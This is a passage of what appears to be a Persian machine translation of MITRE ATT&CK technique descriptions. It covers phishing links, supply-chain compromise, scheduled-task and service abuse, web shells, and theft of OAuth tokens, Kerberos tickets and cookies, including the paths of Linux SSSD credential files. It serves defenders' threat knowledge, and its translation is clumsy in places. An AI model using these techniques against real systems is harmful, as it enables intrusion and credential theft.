یک درایو استفاده می‌شوند، ممکن است توسط یک جامعه خاص، مانند دولت، یک صنعت خاص، یا منطقه مورد بازدید قرار گرفته باشند، که در آن هدف، به خطر انداختن یک کاربر خاص یا مجموعه‌ای از کاربران بر اساس یک اشتراک مشترک است. علاقه. این نوع حمله هدفمند به یک حمله استراتژیک وب یا حمله چاله آب اطلاق می شود. دشمنان ممکن است دامنه‌هایی مشابه دامنه‌های قانونی (مثلاً هموگلیف‌ها، تایپوسکوت، دامنه‌های سطح بالای مختلف، و غیره) را در حین دستیابی به زیرساخت (دامنه‌ها) خریداری کنند تا به سازش Drive-by کمک کنند.

دشمنان ممکن است منابعی را قرار دهند که توسط پیوندی ارجاع داده می شود که می تواند در هنگام هدف گیری مورد استفاده قرار گیرد. حریف ممکن است به کلیک کاربر روی یک پیوند مخرب برای افشای اطلاعات (از جمله اعتبار) یا به دست آوردن اعدام، مانند لینک مخرب، تکیه کند. پیوندها را می توان برای spearphishing استفاده کرد، مانند ارسال یک ایمیل همراه با متن مهندسی اجتماعی برای ترغیب کاربر به کلیک فعال یا کپی و چسباندن URL در مرورگر. قبل از یک فیش برای اطلاعات (مانند پیوند (Spearphishing) یا یک فیش برای دسترسی اولیه به یک سیستم مانند (Spearphishing Link) ، یک دشمن باید منابع یک هدف پیوند را برای پیوند spearphishing تنظیم کند. به طور معمول، منابع برای هدف پیوند یک صفحه HTML است که ممکن است شامل برخی از اسکریپت‌های سمت کلاینت مانند جاوا اسکریپت باشد تا تصمیم بگیرد چه محتوایی را به کاربر ارائه دهد. دشمنان ممکن است سایت‌های قانونی را شبیه‌سازی کنند تا به عنوان هدف پیوند عمل کنند، این می‌تواند شامل شبیه‌سازی صفحات ورود به سرویس‌های وب قانونی یا صفحات ورود به سیستم در تلاش برای جمع‌آوری اعتبار در طول پیوند Spearphishing باشد. همچنین ممکن است دشمنان بدافزار را آپلود کنند و لینک هدف را برای دانلود/اجرا توسط کاربر به بدافزار داشته باشند. دشمنان ممکن است دامنه‌های مشابه دامنه‌های قانونی (مانند هموگلیف‌ها، تایپوسکوت، دامنه‌های مختلف سطح بالا و غیره) را در حین دستیابی به زیرساخت (دامنه‌ها) خریداری کنند تا به تسهیل پیوند مخرب کمک کنند. خدمات کوتاه کردن لینک نیز می‌تواند مورد استفاده قرار گیرد.

دشمنان ممکن است محصولات یا مکانیسم های تحویل محصول را قبل از دریافت توسط مصرف کننده نهایی به منظور به خطر انداختن داده ها یا سیستم دستکاری کنند. به خطر افتادن زنجیره تامین می تواند در هر مرحله از زنجیره تامین از جمله: دستکاری ابزارهای توسعه، دستکاری محیط توسعه، دستکاری مخازن کد منبع (عمومی یا خصوصی)، دستکاری کد منبع در وابستگی های منبع باز، دستکاری مکانیسم های به روز رسانی/توزیع نرم افزار، تصاویر سیستم آسیب دیده/آلوده، جایگزینی نرم افزار قانونی با نسخه های اصلاح شده، فروش محصولات اصلاح شده/تقلبی به توزیع کنندگان قانونی، ممنوعیت حمل و نقل. در حالی که به خطر افتادن زنجیره تامین می‌تواند بر هر جزء از سخت‌افزار یا نرم‌افزار تأثیر بگذارد، مهاجمانی که به دنبال اجرا هستند، اغلب بر افزودن‌های مخرب به نرم‌افزار قانونی در کانال‌های توزیع نرم‌افزار یا به‌روزرسانی متمرکز شده‌اند. هدف‌یابی ممکن است مختص یک مجموعه قربانی مورد نظر باشد یا نرم‌افزار مخرب ممکن است بین مجموعه وسیعی از مصرف‌کنندگان توزیع شود، اما فقط به سمت تاکتیک‌های اضافی بر روی قربانیان خاص حرکت کند. پروژه های منبع باز محبوب که به عنوان وابستگی در بسیاری از برنامه ها استفاده می شوند نیز ممکن است به عنوان ابزاری برای افزودن کد مخرب به کاربران وابستگی مورد هدف قرار گیرند.

دشمنان ممکن است وابستگی‌های نرم افزاری و ابزارهای توسعه را قبل از دریافت توسط مصرف کننده نهایی به منظور به خطر انداختن داده ها یا سیستم دستکاری کنند. برنامه ها اغلب به نرم افزار خارجی برای عملکرد صحیح وابسته هستند. پروژه های منبع باز محبوبی که به عنوان وابستگی در بسیاری از برنامه ها استفاده می شوند ممکن است به عنوان ابزاری برای افزودن کد مخرب به کاربران وابستگی مورد هدف قرار گیرند. هدف گذاری ممکن است مختص یک مجموعه قربانی مورد نظر باشد یا ممکن است بین مجموعه گسترده ای از مصرف کنندگان توزیع شود، اما فقط به سمت تاکتیک های اضافی در مورد قربانیان خاص حرکت می کند.

دشمنان ممکن است نرم افزار کاربردی را قبل از دریافت توسط مصرف کننده نهایی به منظور به خطر انداختن داده ها یا سیستم دستکاری کنند. به خطر انداختن زنجیره تامین نرم‌افزار می‌تواند به روش‌های مختلفی از جمله دستکاری کد منبع برنامه، دستکاری مکانیسم به‌روزرسانی/توزیع برای آن نرم‌افزار، یا جایگزینی نسخه‌های کامپایل‌شده با نسخه اصلاح‌شده رخ دهد. هدف گیری ممکن است مختص یک مجموعه قربانی مورد نظر باشد یا ممکن است بین مجموعه وسیعی از مصرف کنندگان توزیع شود، اما فقط به سمت تاکتیک های اضافی در مورد قربانیان خاص حرکت می کند.

دشمنان ممکن است اجزای سخت افزاری محصولات را قبل از دریافت توسط مصرف کننده نهایی به منظور به خطر انداختن داده‌ها یا سیستم دستکاری کنند. با اصلاح سخت‌افزار در زنجیره تامین، دشمنان می‌توانند backdoors را وارد شبکه‌های مصرف‌کننده که شناسایی آن ممکن است دشوار باشد و درجه بالایی از کنترل بر سیستم را به دشمن بدهد. backdoorsسخت‌افزاری ممکن است در دستگاه‌های مختلفی مانند سرورها، ایستگاه‌های کاری، زیرساخت‌های شبکه یا لوازم جانبی وارد شوند.

ممکن است دشمنان از عملکرد زمان‌بندی کار برای تسهیل اجرای اولیه یا تکراری کد مخرب سوء استفاده کنند. ابزارهای کمکی در تمام سیستم عامل های اصلی وجود دارند تا برنامه ها یا اسکریپت ها را در تاریخ و زمان مشخصی اجرا کنند. یک کار همچنین می تواند در یک سیستم راه دور برنامه ریزی شود، مشروط بر اینکه احراز هویت مناسب انجام شود (مثلاً: RPC و اشتراک گذاری فایل و چاپگر در محیط های ویندوز). زمان‌بندی یک کار در یک سیستم راه دور معمولاً مستلزم عضویت در یک سرپرست یا گروه ممتاز در سیستم راه دور است.دشمنان ممکن است از زمان‌بندی وظایف برای اجرای برنامه‌ها در هنگام راه‌اندازی سیستم یا بر اساس برنامه‌ریزی‌شده برای تداوم استفاده کنند. همچنین می‌توان از این مکانیسم‌ها برای اجرای یک فرآیند در چارچوب یک حساب مشخص (مانند حسابی با مجوزها/امتیازات بالا) سوء استفاده کرد.

دشمنان ممکن است از ابزار برای انجام وظایف اجرای اولیه، مکرر یا آتی کد مخرب سوء استفاده کنند. فرمان at در سیستم عامل های لینوکس، مدیران را قادر می سازد تا وظایف را زمان بندی کنند. یک دشمن ممکن است در محیط های لینوکس برای اجرای برنامه ها در هنگام راه اندازی سیستم یا بر اساس نقشه برنامه ریزی شده برای تداوم استفاده کند.

دشمنان ممکن است از ابزار at.exe برای انجام برنامه ریزی وظایف برای اجرای اولیه یا تکراری کد مخرب سوءاستفاده کنند. ابزار at به عنوان یک فایل اجرایی در ویندوز برای زمان‌بندی وظایف در زمان و تاریخ مشخص وجود دارد. استفاده از at مستلزم آن است که سرویس Task Scheduler در حال اجرا باشد و کاربر به عنوان عضوی از گروه Administrators محلی وارد سیستم شود. حریف ممکن است از at.exe در محیط‌های ویندوز برای اجرای برنامه‌ها در هنگام راه‌اندازی سیستم یا بر اساس برنامه‌ریزی‌شده برای تداوم استفاده کند. در همچنین می‌تواند برای انجام اجرای از راه دور به عنوان بخشی از حرکت جانبی و یا اجرای فرآیندی در چارچوب یک حساب مشخص مانند (SYSTEM) مورد سوء استفاده قرار گیرد. توجه: ابزار خط فرمان at.exe در نسخه های فعلی ویندوز به نفع schtasks منسوخ شده است.

دشمنان ممکن است از برنامه Cronبرای اجرای برنامه ریزی وظایف برای اجرای اولیه یا تکراری کد مخرب سوء استفاده کنند. ابزار Cron یک زمانبندی کار مبتنی بر زمان برای سیستم عامل های مشابه یونیکس است. فایل crontab شامل برنامه زمانبندی ورودی های Cronبرای اجرا و زمان های مشخص شده برای اجرا می باشد. هر فایل crontab در مسیرهای فایل خاص سیستم عامل ذخیره می شود. دشمن ممکن است از Cronدر محیط‌های لینوکس یا یونیکس برای اجرای برنامه‌ها در هنگام راه‌اندازی سیستم یا بر اساس برنامه‌ریزی‌شده برای پایداری استفاده کند.

دشمنان ممکن است از Windows Task Scheduler برای انجام برنامه ریزی وظایف برای اجرای اولیه یا تکراری کدهای مخرب سوء استفاده کنند. راه های مختلفی برای دسترسی به Task Scheduler در ویندوز وجود دارد. schtasks را می توان مستقیماً در خط فرمان اجرا کرد یا Task Scheduler را می توان از طریق رابط کاربری گرافیکی در بخش Administrator Tools در کنترل پنل باز کرد.

دشمنان ممکن است از تایمرهای سیستمی برای انجام برنامه ریزی وظایف و برای اجرای اولیه یا تکراری کدهای مخرب سوء استفاده کنند. تایمرهای Systemd فایل های واحدی با پسوند فایلtimer. هستند که خدمات را کنترل می کنند. تایمرها را می توان طوری تنظیم کرد که روی یک رویداد تقویمی یا پس از یک بازه زمانی نسبت به نقطه شروع اجرا شوند. آنها می توانند به عنوان جایگزینی برای Cron در محیط های لینوکس استفاده شوند. تایمرهای سیستمی ممکن است از راه دور از طریق ابزار خط فرمان systemctl که روی SSH کار می کند، فعال شوند.

دشمنان ممکن است از عملکرد زمان‌بندی کار ارائه شده توسط ابزارهای هماهنگ‌سازی کانتینر مانند Kubernetes برای برنامه‌ریزی استقرار کانتینرهایی که برای اجرای کدهای مخرب پیکربندی شده‌اند سوء استفاده کنند. کارهای ارکستراسیون کانتینر این وظایف خودکار را در تاریخ و زمان خاصی اجرا می کنند، مشابه کارهای cron در یک سیستم لینوکس. استقرارهای این نوع همچنین می توانند برای نگهداری مقداری از کانتینرها در طول زمان پیکربندی شوند و فرآیند حفظ پایداری در یک خوشه را خودکار کنند. در Kubernetes، CronJob ممکن است برای برنامه‌ریزی کاری استفاده شود که یک یا چند کانتینر را برای انجام وظایف خاص اجرا می‌کند. بنابراین، یک دشمن ممکن است از CronJob برای برنامه‌ریزی استقرار یک Job استفاده کند که کدهای مخرب را در گره‌های مختلف در یک خوشه اجرا می‌کند.

دشمنان ممکن است بارهای مخرب را از طریق بارگذاری ماژول های مشترک اجرا کنند. به بارگذار ماژول ویندوز می‌توان دستور بارگذاری DLLها را از مسیرهای محلی دلخواه و مسیرهای شبکه کنوانسیون نام‌گذاری جهانی (UNC ) داد. این قابلیت در NTDLL.dll قرار دارد و بخشی از Windows Native API است که از توابعی مانند CreateProcess، LoadLibrary و غیره فراخوانی می شود.

دشمنان ممکن است به مجموعه‌های نرم‌افزاری شخص ثالث نصب شده در یک شبکه سازمانی مانند سیستم‌های مدیریت، نظارت و استقرار برای حرکت جانبی در شبکه دسترسی پیدا کنند و از آنها استفاده کنند. برنامه‌های شخص ثالث و سیستم‌های استقرار نرم‌افزار ممکن است در محیط شبکه برای اهداف مدیریتی استفاده شوند (مانند SCCM، HBSS، Altiris و غیره). دسترسی به یک سیستم نرم افزاری در سطح شبکه یا سازمانی شخص ثالث ممکن است به دشمن امکان اجرای کد از راه دور را در تمام سیستم هایی که به چنین سیستمی متصل هستند را بدهد. این دسترسی ممکن است برای انتقال جانبی به سیستم‌های دیگر، جمع‌آوری اطلاعات یا ایجاد یک اثر خاص، مانند پاک کردن هارد دیسک‌ها در تمام نقاط پایانی استفاده شود. مجوزهای مورد نیاز برای این عمل بسته به پیکربندی سیستم متفاوت است. اعتبار محلی ممکن است با دسترسی مستقیم به سیستم شخص ثالث کافی باشد، یا ممکن است اعتبار دامنه خاصی مورد نیاز باشد. با این حال، سیستم ممکن است نیاز به یک حساب اداری برای ورود به سیستم یا انجام هدف مورد نظر خود داشته باشد.

دشمنان ممکن است از سرویس‌های سیستم یا شیاطین برای اجرای دستورات یا برنامه‌ها سوءاستفاده کنند. دشمنان می توانند محتوای مخرب را با تعامل یا ایجاد سرویس ها به صورت محلی یا از راه دور اجرا کنند. بسیاری از سرویس‌ها قرار است در هنگام راه‌اندازی اجرا شوند، که می‌تواند به پایداری (ایجاد یا اصلاح فرآیند سیستم) کمک کند، اما دشمنان همچنین می‌توانند از خدمات برای اجرای یک‌باره یا موقت سوء استفاده کنند.

ممکن است دشمنان از launchctl برای اجرای دستورات یا برنامه‌ها سوء استفاده کنند. Launchctl با راه اندازی، چارچوب مدیریت خدمات برای macOS رابط کاربری دارد. Launchctl از گرفتن دستورات فرعی در خط فرمان، به صورت تعاملی، یا حتی تغییر مسیر از ورودی استاندارد پشتیبانی می کند.دشمنان از launchctl برای اجرای دستورات و برنامه ها به عنوان Launch Agents یا Launch Daemons استفاده می کنند. دستورات فرعی رایج عبارتند از: launchctl load، launchctl unload و .launchctl start دشمنان می‌توانند از اسکریپت‌ها استفاده کنند.

دشمنان ممکن است از مدیر کنترل سرویس ویندوز برای اجرای دستورات یا بارهای مخرب سوء استفاده کنند. مدیر کنترل سرویس ویندوز (services.exe) یک رابط برای مدیریت و دستکاری خدمات است. مدیر کنترل سرویس از طریق اجزای رابط کاربری گرافیکی و همچنین ابزارهای سیستمی مانند sc.exe و Net در دسترس کاربران است. PsExec همچنین می‌تواند برای اجرای دستورات یا بارهای پرداختی از طریق یک سرویس موقت ویندوز ایجاد شده از طریق API مدیریت کنترل سرویس استفاده شود. ابزارهایی مانند PsExec و sc.exe می‌توانند سرورهای راه دور را به عنوان آرگومان بپذیرند و ممکن است برای اجرای اجرای از راه دور استفاده شوند.دشمنان ممکن است از این مکانیسم ها برای اجرای محتوای مخرب استفاده کنند. این را می توان با اجرای یک سرویس جدید یا اصلاح شده انجام داد. این تکنیک، اجرای همراه با سرویس ویندوز در هنگام تداوم سرویس یا افزایش امتیازات است.

دشمنان ممکن است از ویژگی‌های توسعه قابل توسعه قانونی سرورها برای ایجاد دسترسی دائمی به سیستم‌ها سوء استفاده کنند. برنامه های کاربردی سرور سازمانی ممکن است شامل ویژگی هایی باشد که به توسعه دهندگان اجازه می دهد تا نرم افزار یا اسکریپت هایی را برای گسترش عملکرد برنامه اصلی بنویسند و نصب کنند. دشمنان ممکن است اجزای مخرب را برای گسترش و سوء استفاده از برنامه های سرور نصب کنند.

ممکن است دشمنان از رویه های ذخیره شده SQL برای ایجاد دسترسی دائمی به سیستم ها سوء استفاده کنند. رویه‌های ذخیره‌شده SQL کدهایی هستند که می‌توان آن‌ها را ذخیره و مجدداً استفاده کرد تا کاربران پایگاه‌داده زمان را برای بازنویسی پرس‌و‌جوهای پرکاربردSQL تلف نکنند. رویه‌های ذخیره‌شده را می‌توان از طریق دستورات SQLبه پایگاه داده با استفاده از نام رویه یا از طریق رویدادهای تعریف‌شده فراخوانی کرد (مثلاً زمانی که یک برنامه سرور SQLراه‌اندازی/راه‌اندازی مجدد می‌شود). دشمنان ممکن است رویه‌های ذخیره‌شده مخربی ایجاد کنند که می‌توانند مکانیسم پایداری را در سرورهای پایگاه داده SQLارائه دهند. برای اجرای دستورات سیستم عامل از طریق نحو SQL، دشمن ممکن است مجبور باشد عملکردهای اضافی را فعال کند.

دشمنان ممکن است از عوامل حمل و نقل مایکروسافت برای ایجاد دسترسی دائمی به سیستم ها سوء استفاده کنند. عوامل انتقال مایکروسافت اکسچنج می‌توانند روی پیام‌های ایمیلی که از خط لوله انتقال عبور می‌کنند کار کنند تا کارهای مختلفی مانند فیلتر کردن هرزنامه، فیلتر کردن پیوست‌های مخرب، ژورنال کردن یا اضافه کردن یک امضای شرکتی به انتهای همه ایمیل‌های خروجی انجام دهند. عوامل حمل و نقل را می توان توسط توسعه دهندگان برنامه نوشت و سپس در مجموعه های NET. که متعاقباً در سرور Exchange ثبت می شوند، کامپایل کرد. عوامل حمل و نقل در طول یک مرحله مشخص از پردازش ایمیل فراخوانی می شوند و وظایف تعریف شده توسط توسعه دهنده را انجام می دهند. دشمنان ممکن است یک عامل حمل و نقل مخرب را ثبت کنند تا مکانیزم پایداری را در Exchange Server ارائه دهند که می تواند توسط رویدادهای ایمیل مشخص شده توسط دشمن ایجاد شود. اگرچه ممکن است یک عامل حمل و نقل مخرب برای همه ایمیل‌هایی که از خط لوله انتقال Exchange عبور می‌کنند فراخوانی شود، این عامل می‌تواند به گونه‌ای پیکربندی شود که فقط وظایف خاصی را در پاسخ به معیارهای تعریف شده دشمن انجام دهد. به عنوان مثال، عامل حمل و نقل تنها ممکن است اقدامی مانند کپی کردن پیوست های حین حمل و نقل و ذخیره آنها برای استخراج بعدی را انجام دهد در صورتی که آدرس ایمیل گیرنده با ورودی لیست ارائه شده توسط دشمن مطابقت داشته باشد.

دشمنان ممکن است سرورهای وب را با پوسته‌های وب برای ایجاد دسترسی دائمی به سیستم‌ها در پشت خود قرار دهند. پوسته وب یک اسکریپت وب است که بر روی یک وب سرور قابل دسترسی آزاد قرار می گیرد تا به دشمن اجازه دهد از وب سرور به عنوان دروازه ورود به شبکه استفاده کند. یک پوسته وب ممکن است مجموعه‌ای از توابع را برای اجرا یا یک رابط خط فرمان در سیستمی که سرور وب را میزبانی می کند ارائه دهد. علاوه بر یک اسکریپت سمت سرور، یک پوسته وب ممکن است یک برنامه رابط مشتری داشته باشد که برای صحبت با سرور وب استفاده می شود (مثلاً: China Chopper Web shell Client )

دشمنان ممکن است اجزای مخربی را نصب کنند که بر روی سرورهای وب سرویس‌های اطلاعات اینترنتی (IIS) اجرا می‌شوند تا پایداری ایجاد کنند. IISمکانیسم های مختلفی را برای گسترش عملکرد وب سرورها ارائه می دهد. به عنوان مثال، پسوندها و فیلترهای رابط برنامه نویسی برنامه سرور اینترنت (ISAPI) را می‌توان برای بررسی و یا اصلاح درخواست های وب ورودی و خروجی IISنصب کرد. دشمنان ممکن است افزونه‌ها و فیلترهای مخرب ISAPI را برای مشاهده و/یا اصلاح ترافیک، اجرای دستورات در ماشین‌های در معرض خطر، یا فرمان پروکسی و کنترل ترافیک نصب کنند. پسوندها و فیلترهای ISAPI ممکن است به تمام درخواست‌ها و پاسخ‌های وب IIS دسترسی داشته باشند. برای مثال، یک دشمن ممکن است از این مکانیسم‌ها برای اصلاح پاسخ‌های HTTP به منظور توزیع دستورات/محتوای مخرب در میزبان‌های قبلاً تشکیل‌شده سوء استفاده کند.

دشمنان می توانند توکن های دسترسی برنامه های کاربر را به عنوان ابزاری برای به دست آوردن اعتبار برای دسترسی به سیستم ها و منابع راه دور بدزدند. این می تواند از طریق مهندسی اجتماعی رخ دهد و معمولاً نیاز به اقدام کاربر برای اعطای دسترسی دارد. نشانه‌های دسترسی برنامه برای ایجاد درخواست‌های مجاز API از طرف یک کاربر استفاده می‌شوند و معمولاً به عنوان راهی برای دسترسی به منابع در برنامه‌های کاربردی مبتنی بر ابر و نرم‌افزار به‌عنوان سرویس ( SaaS) استفاده می‌شوند. OAuth یکی از چارچوب‌هایی است که معمولاً پیاده‌سازی می‌شود که توکن‌هایی را برای کاربران برای دسترسی به سیستم‌ها صادر می‌کند. برنامه‌ای که مایل به دسترسی به سرویس‌های مبتنی بر ابر یا APIهای محافظت‌شده است، می‌تواند با استفاده از OAuth 2.0 از طریق انواع پروتکل‌های مجوز وارد شود. نمونه‌ای از دنباله‌ای که معمولاً مورد استفاده قرار می‌گیرد، جریان اعطای کد مجوز مایکروسافت است. یک نشانه دسترسی OAuth به یک برنامه شخص ثالث امکان می دهد تا با منابع حاوی داده‌های کاربر به روش های درخواست شده توسط برنامه بدون دریافت اعتبار کاربر تعامل داشته باشد.دشمنان می توانند با ساختن یک برنامه مخرب طراحی شده برای دسترسی به منابع با توکن OAuth کاربر هدف، از مجوز OAuth استفاده کنند. حریف باید ثبت نام برنامه خود را با سرور مجوز تکمیل کند، برای مثال Microsoft Identity Platform با استفاده از Azure Portal، Visual Studio IDE، رابط خط فرمان، PowerShell یا تماس‌های REST API سپس، آنها می توانند پیوندی را از طریق Spearphishing Link برای کاربر مورد نظر ارسال کنند تا آنها را ترغیب کنند تا به برنامه دسترسی داشته باشند. هنگامی که نشانه دسترسی OAuth اعطا شد، برنامه می‌تواند از طریق Application Access Token به ویژگی‌های حساب کاربری دسترسی طولانی‌مدت داشته باشد. دشمنانی دیده شده اند که کاربران جی میل، مایکروسافت اوت لوک و یاهو میل را هدف قرار داده اند.

دشمنان ممکن است با دزدیدن یا جعل بلیط های Kerberos برای فعال کردن Pass the Ticket تلاش کنند تا احراز هویت Kerberos را مخدوش کنند. Kerberos یک پروتکل احراز هویت است که به طور گسترده در محیط‌های دامنه مدرن ویندوز استفاده می شود. در محیط‌های Kerberos، که به آنها "قلمروها" گفته می‌شود، سه شرکت کننده اصلی وجود دارد: مشتری، سرویس، و مرکز توزیع کلید (KDC) مشتریان درخواست دسترسی به یک سرویس را دارند و از طریق مبادله بلیط های Kerberos که از KDC منشا می گیرند، پس از احراز هویت موفقیت آمیز به آنها اجازه دسترسی داده می شود. KDC مسئول احراز هویت و اعطای بلیط است. مهاجمان ممکن است با سرقت بلیط یا جعل بلیط برای فعال کردن دسترسی غیرمجاز، سعی کنند از Kerberos سوء استفاده کنند. در ویندوز، ابزار داخلی klist می‌تواند برای فهرست کردن و تحلیل بلیط‌های Kerberos در حافظه پنهان استفاده شود. سیستم‌های لینوکس در دامنه‌های اکتیو دایرکتوری، اعتبار Kerberos را به صورت محلی در فایل حافظه پنهان اعتبار که به آن " "cache گفته می‌شود، ذخیره می‌کنند. اعتبارنامه ها تا زمانی که معتبر می مانند و به طور کلی تا زمانی که جلسه کاربر طول می کشد، در فایل ccache ذخیره می شوند. در سیستم‌های لینوکس مدرن Redhat Enterprise و توزیع‌های مشتق شده، سیستم امنیت خدمات دیمون (SSSD) بلیط‌های Kerberos را مدیریت می‌کند. به طور پیش فرض SSSD یک کپی از پایگاه داده بلیط را که می‌تواند در /var/lib/sss/secrets/secrets.ldb و همچنین کلید مربوطه در //var/lib/sss/secrets/.secrets.mkey یافت می شود، نگهداری می کند. هر دو فایل برای خواندن نیاز به دسترسی روت دارند. اگر دشمن بتواند به پایگاه داده و کلید دسترسی داشته باشد، حافظه پنهان اعتبار Kerberos blob را می توان استخراج کرد و به یک فایل ccache Kerberos قابل استفاده تبدیل کرد که دشمنان ممکن است برای Pass the Ticket از آن استفاده کنند. فایل ccache همچنین ممکن است با استفاده از ابزارهایی مانند Kekeo به فرمت ویندوز تبدیل شود. بلیط‌های Kerberos در macOS در قالب استاندارد ccache، مشابه لینوکس، ذخیره می‌شوند. به طور پیش‌فرض، دسترسی به این ورودی‌های حافظه پنهان از طریق فرآیند شبح KCM از طریق پروتکل Mach RPC، که از محیط تماس‌گیرنده برای تعیین دسترسی استفاده می‌کند، فدرال می‌شود. محل ذخیره سازی این ورودی های حافظه پنهان تحت تأثیر فایل پیکربندی /etc/krb5.conf و متغیر محیطی KRB5CCNAME است که می تواند تعیین کند تا آنها را در دیسک ذخیره کند یا از طریق دیمون KCM محافظت شود. کاربران می‌توانند با استفاده از باینری های داخلی kinit, klist, ktutil, and kcc از طریق فریم ورک Kerberos بومی اپل، با ذخیره سازی بلیط تعامل داشته باشند. دشمنان می توانند از ابزارهای منبع باز برای تعامل مستقیم با فایل‌های حافظه پنهان یا استفاده از چارچوب Kerberos برای فراخوانی API های سطح پایین تر برای استخراج TGT یا بلیط های سرویس کاربر استفاده کنند.

یک دشمن ممکن است کوکی‌های جلسه برنامه یا خدمات وب را بدزدد و از آنها برای دسترسی به برنامه‌های کاربردی وب یا سرویس‌های اینترنتی به عنوان یک کاربر تأیید شده بدون نیاز به اعتبار استفاده کند. برنامه‌ها و سرویس‌های وب اغلب از کوکی‌های جلسه به‌عنوان نشانه احراز هویت پس از احراز هویت کاربر در یک وب‌سایت استفاده می‌کنند.کوکی ها اغلب برای مدت طولانی معتبر هستند، حتی اگر برنامه وب به طور فعال استفاده نشود. کوکی‌ها را می‌توان روی دیسک، حافظه پردازش مرورگر و در ترافیک شبکه به سیستم‌های راه دور پیدا کرد. علاوه بر این، سایر برنامه‌های کاربردی در دستگاه هدف ممکن است کوکی‌های احراز هویت حساس را در حافظه ذخیره کنند (مانند برنامه‌هایی که در سرویس‌های ابری احراز هویت می‌شوند). از کوکی‌های جلسه می‌توان برای دور زدن برخی از پروتکل‌های احراز هویت چند عاملی استفاده کرد. چندین نمونه از بدافزارهایی که کوکی‌ها را از مرورگرهای وب در سیستم محلی هدف قرار می‌دهند وجود دارد. همچنین چارچوب‌های منبع باز مانند Evilginx 2 and Muraenaوجود دارند که می‌توانند کوکی‌های جلسه را از طریق یک پروکسی مخرب جمع‌آوری کنند (مثلاً: (Adversary-in-the-Middle) که می‌تواند توسط یک دشمن تنظیم شود و در کمپین‌های فیشینگ استفاده شود. پس از اینکه دشمن یک کوکی معتبر به دست آورد، می‌تواند یک تکنیک Web Session Cookie را برای ورود به برنامه وب مربوطه اجرا کند.

ممکن است دشمنان سعی کنند فهرستی از نرم افزارها و نسخه های نرم افزاری را که بر روی یک سیستم یا در محیط ابری نصب شده اند، دریافت کنند. دشمنان ممکن است از اطلاعات Software Discovery در طول کشف خودکار برای شکل دادن به رفتارهای بعدی استفاده کنند، از جمله اینکه آیا دشمن به طور کامل هدف را آلوده می کند و/یا اقدامات خاصی را انجام می دهد. دشمنان ممکن است به دلایل مختلفی سعی کنند نرم افزار را برشمارند، از جمله اینکه بدانند چه اقدامات امنیتی وجود دارد یا اینکه آیا سیستم در معرض خطر دارای نسخه ای از نرم افزار است که در برابر سوء استفاده برای افزایش امتیاز آسیب پذیر است.

دشمن ممکن است تلاش کند اطلاعات دقیقی در مورد سیستم عامل و سخت افزار، از جمله نسخه، وصله ها، رفع فوری، بسته های خدمات و معماری به دست آورد. دشمنان ممکن است از اطلاعات کشف اطلاعات سیستم در حین کشف خودکار برای شکل دادن به رفتارهای بعدی استفاده کنند، از جمله اینکه آیا دشمن به طور کامل هدف را آلوده می کند و/یا اقدامات خاصی را انجام می دهد. برای جمع آوری اطلاعات دقیق سیستم می توان از ابزارهایی مانند Systeminfo استفاده کرد. اگر با دسترسی ممتاز اجرا می شود، می توان تجزیه و تحلیل داده های سیستم را از طریق ابزار پیکربندی systemetup در macOS جمع آوری کرد. به عنوان مثال، دشمنان با دسترسی در سطح کاربر می توانند دستور df -aH را برای به دست آوردن دیسک های نصب شده فعلی و فضای آزادانه مرتبط با آن اجرا کنند. کشف اطلاعات سیستم همراه با اطلاعات جمع‌آوری‌شده از اشکال دیگر کشف و شناسایی می‌تواند باعث توسعه و پنهان‌سازی محموله شود.

دشمنان ممکن است اطلاعاتی را در تلاش برای محاسبه موقعیت جغرافیایی میزبان قربانی جمع آوری کنند. دشمنان ممکن است از اطلاعات «کشف موقعیت مکانی سیستم» در حین کشف خودکار برای شکل دادن به رفتارهای بعدی استفاده کنند، از جمله اینکه آیا دشمن به طور کامل هدف را آلوده می کند و یا اقدامات خاصی را انجام می دهد. دشمنان ممکن است با استفاده از بررسی‌های سیستمی مختلف، مانند منطقه زمانی، طرح‌بندی صفحه‌کلید و/یا تنظیمات زبان، مکان یک سیستم را استنتاج کنند. توابع Windows API مانند GetLocaleInfoW نیز می توانند برای تعیین منطقه میزبان استفاده شوند. در محیط های ابری، منطقه در دسترس بودن یک نمونه نیز ممکن است با دسترسی به سرویس ابرداده نمونه از نمونه کشف شود. همچنین ممکن است دشمنان با استفاده از آدرس‌دهی IP، مانند سرویس‌های جستجوی IP موقعیت جغرافیایی آنلاین، مکان میزبان قربانی را استنباط کنند.

دشمنان ممکن است به دنبال جزئیات مربوط به پیکربندی و تنظیمات شبکه، مانند آدرس‌های IP و یا MAC، سیستم‌هایی باشند که به آنها دسترسی دارند یا از طریق کشف اطلاعات سیستم‌های راه دور. چندین ابزار مدیریت سیستم عامل وجود دارد که می توان از آنها برای جمع آوری این اطلاعات استفاده کرد. به عنوان مثال می توان به Arp، ipconfig/ifconfig، nbtstat و route اشاره کرد. دشمنان ممکن است از اطلاعات System Network Configuration Discovery در طول کشف خودکار برای شکل دادن به رفتارهای بعدی، از جمله تعیین دسترسی معین در شبکه هدف و اقدامات بعدی استفاده کنند.

دشمنان ممکن است سعی کنند با جستجوی اطلاعات در شبکه، فهرستی از اتصالات شبکه به یا از سیستم در معرض خطری که در حال حاضر به آن دسترسی دارند یا از سیستم های راه دور دریافت کنند.حریفی که به سیستمی دسترسی پیدا می‌کند که بخشی از یک محیط مبتنی بر ابر است، ممکن است ابرهای خصوصی مجازی یا شبکه‌های مجازی را ترسیم کند تا مشخص کند چه سیستم‌ها و سرویس‌هایی متصل هستند. اقدامات انجام شده احتمالاً همان نوع تکنیک های کشف بسته به سیستم عامل هستند، اما اطلاعات حاصل ممکن است شامل جزئیاتی در مورد محیط ابری شبکه شده مرتبط با اهداف دشمن باشد. ارائه‌دهندگان ابر ممکن است راه‌های متفاوتی برای عملکرد شبکه‌های مجازی‌شان داشته باشند. ابزارها و دستوراتی که این اطلاعات را به دست می آورند.

